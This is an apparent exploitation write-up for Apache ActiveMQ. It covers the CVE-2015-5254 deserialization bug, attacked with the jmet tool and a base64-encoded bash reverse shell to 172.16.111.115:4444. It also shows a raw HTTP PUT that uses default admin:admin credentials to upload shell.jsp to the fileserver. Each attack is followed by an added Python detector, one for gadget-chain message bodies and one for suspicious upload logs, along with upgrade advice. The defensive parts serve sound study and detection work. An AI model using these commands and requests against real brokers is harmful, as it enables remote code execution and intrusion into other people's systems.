ActiveMQ getshell exploitation - lanc: 0X01 ActiveMQ deserialization vulnerability (CVE-2015-5254) - 漏洞文库小世界 - 安全文库 - NGC660安全实验室

### ActiveMQ getshell exploitation - lanc

0X01 ActiveMQ deserialization vulnerability (CVE-2015-5254)

java -jar /Users/fengxiao/tool/工具/内网渗透/ActiveMQ/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 127.0.0.1 61616

Port 61616 is the broker's working port; messages are delivered through it.


After logging in to the admin console (account/password admin/admin), the message is visible.


Click this message; if a file named success has been created under /tmp inside the Docker container, the vulnerability is exploitable.


java -jar /Users/fengxiao/tool/工具/内网渗透/ActiveMQ/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTExLjExNS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 127.0.0.1 61616

bash -i >& /dev/tcp/172.16.111.115/4444 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTExLjExNS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

Clicking the added message triggers the reverse shell.
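From the defender's side, the same mechanism is what a broker-side or wire-capture check needs to spot: an ObjectMessage whose body is a Java serialization stream referencing classes from a known gadget chain (the `-Yp ROME` payload above uses the ROME library's `com.sun.syndication.feed.impl` classes). The following scanner is an added example written for this page, not code from the original post or from the jmet tool; the message bodies are constructed samples, and the gadget-class watchlist is an assumption you should extend for your environment.

```python
import re
from typing import Dict, List

# Magic bytes that open every Java serialization stream (STREAM_MAGIC + version 5).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# Class-name prefixes from publicly documented gadget chains. The ROME chain used by
# jmet's "-Yp ROME" lives under com.sun.syndication.feed.impl.; the other entries are
# further well-known chains (assumption: tune this list for the libraries your broker ships).
GADGET_WATCHLIST = (
    "com.sun.syndication.feed.impl.",
    "org.apache.commons.collections.functors.",
    "javax.management.BadAttributeValueExpException",
)

# Dotted Java class names appear as plain ASCII inside serialized class descriptors.
CLASS_NAME_RE = re.compile(rb"[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+")


def inspect_message(body: bytes) -> Dict[str, object]:
    """Classify one message body as 'clean', 'serialized' or 'gadget'."""
    if not body.startswith(JAVA_STREAM_MAGIC):
        return {"verdict": "clean", "classes": [], "hits": []}
    classes: List[str] = [c.decode("ascii") for c in CLASS_NAME_RE.findall(body)]
    hits = [c for c in classes if c.startswith(GADGET_WATCHLIST)]
    return {"verdict": "gadget" if hits else "serialized", "classes": classes, "hits": hits}


# Constructed samples (not real captures): a text message, a benign serialized
# java.util.HashMap, and a stream whose first class descriptor names the ROME ObjectBean.
SAMPLE_TEXT = b"order-42 shipped"
SAMPLE_BENIGN = (
    JAVA_STREAM_MAGIC
    + b"sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02"
    + b"F\x00\nloadFactorI\x00\tthresholdxp"
)
SAMPLE_GADGET = (
    JAVA_STREAM_MAGIC
    + b"sr\x00\x28com.sun.syndication.feed.impl.ObjectBean"
    + b"\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03L\x00\x0b_equalsBean"
)

if __name__ == "__main__":
    for name, body in (("text", SAMPLE_TEXT), ("hashmap", SAMPLE_BENIGN), ("rome", SAMPLE_GADGET)):
        result = inspect_message(body)
        print(f"{name:8s} -> {result['verdict']:10s} hits={result['hits']}")
```

The check is a triage heuristic, not a parser: it only reads class names out of the descriptors, so it will miss a chain whose classes are not on the watchlist. The durable fix is upgrading past 5.13.0, where ActiveMQ only deserializes ObjectMessage bodies from packages allowed by the `org.apache.activemq.SERIALIZABLE_PACKAGES` system property.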


0X02 ActiveMQ PUT upload

PUT /fileserver/shell.jsp HTTP/1.1
Host: 192.168.197.25:8161
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 26

shell

The installation path can be looked up at: http://127.0.0.1:8161/admin/test/systemProperties.jsp


A 204 response means the upload succeeded.


Inspecting the ActiveMQ directory confirms that the shell was uploaded successfully.
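The two requests that make up this section (the path lookup on systemProperties.jsp and the PUT to /fileserver/ answered with 204) are easy to pick out of web access logs. Below is an added detection example written for this page, not code from the original post; it assumes the broker's HTTP traffic on port 8161 is logged in NCSA common log format by Jetty's request log or a reverse proxy (an assumption), and the log lines are constructed samples. It also flags MOVE, which the fileserver webapp accepts for relocating an uploaded file, in addition to the PUT shown above.

```python
import re
from typing import Dict, List, Optional

# NCSA common log format (assumption: Jetty's request log or a reverse proxy in front
# of port 8161 writes the broker's HTTP traffic this way).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

WRITE_METHODS = {"PUT", "MOVE"}                     # methods that create or relocate files
EXEC_EXTS = (".jsp", ".jspx", ".war", ".jar")        # content a servlet container will execute
RECON_PATHS = {"/admin/test/systemproperties.jsp"}  # reveals activemq.home and other paths


def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Return an alert for a suspicious request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, path, status = m["method"], m["path"], int(m["status"])
    lowered = path.lower()
    base = {"ip": m["ip"], "time": m["ts"], "method": method, "path": path, "status": status}
    if method in WRITE_METHODS and lowered.startswith("/fileserver/"):
        executable = lowered.endswith(EXEC_EXTS)
        return {
            **base,
            "accepted": status in (201, 204),   # 204 is what the fileserver returns on success
            "severity": "high" if executable or method == "MOVE" else "medium",
            "reason": f"{method} to fileserver webapp"
            + (" with executable extension" if executable else ""),
        }
    if method == "GET" and lowered in RECON_PATHS:
        return {**base, "accepted": status == 200, "severity": "medium",
                "reason": "recon: system properties page reveals install paths"}
    return None


def analyze_log(text: str) -> List[Dict[str, object]]:
    """Run analyze_line over every line of a log and collect the alerts in order."""
    alerts = []
    for line in text.splitlines():
        alert = analyze_line(line)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample log (not a real capture): normal admin use, then the sequence
# from this section: PUT of a .jsp to the fileserver, a look at systemProperties.jsp,
# and a harmless text upload for comparison.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2022:10:30:12 +0800] "GET /admin/index.jsp HTTP/1.1" 200 5123
10.0.0.9 - - [10/Jan/2022:10:30:48 +0800] "PUT /fileserver/shell.jsp HTTP/1.1" 204 0
10.0.0.9 - - [10/Jan/2022:10:30:49 +0800] "GET /admin/test/systemProperties.jsp HTTP/1.1" 200 8844
10.0.0.9 - - [10/Jan/2022:10:31:02 +0800] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
"""

if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG):
        print(f"[{alert['severity']:6s}] {alert['ip']} {alert['method']} {alert['path']} "
              f"{alert['status']} accepted={alert['accepted']} :: {alert['reason']}")
```

A single high-severity hit from an IP that also touched systemProperties.jsp within the same minute is the pattern worth paging on. The underlying exposure is the fileserver webapp itself: it is not needed for messaging, is defined in conf/jetty.xml, and is removed entirely in ActiveMQ 5.14.0 and later, so deleting that context on older installs closes the upload path regardless of credentials.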
